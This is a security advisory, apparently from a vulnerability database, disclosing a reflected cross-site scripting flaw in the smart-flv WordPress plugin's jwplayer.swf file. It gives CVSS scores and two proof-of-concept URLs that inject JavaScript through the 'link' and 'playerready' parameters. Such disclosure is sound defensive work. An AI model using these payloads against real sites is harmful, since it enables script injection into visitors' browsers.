WordPress plugin smart-flv jwplayer.swf XSS

2013-02-25 / 2013-02-26
Credit: Henri Salo
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

With wpscan-team I noticed that file jwplayer.swf in WordPress plugin smart-flv is vulnerable to reflected XSS vulnerability. URL: http://wordpress.org/extend/plugins/smart-flv/ 416d0313c5f286c3a8e9daff520a9f44439b93f7 http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf With user interaction (clicking the page): https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link No interaction: https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29 WordPress guys could you report this to the developer since I don't know his/her email address, thanks? Could you also tell me if there is a way to contact plugin developers directly, thank you. Please include CVE to changelog if possible. -- Henri Salo ps. http://paste.nerv.fi/36167527-horse.jpeg

References:

http://paste.nerv.fi/36167527-horse.jpeg
http://seclists.org/oss-sec/2013/q1/446


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top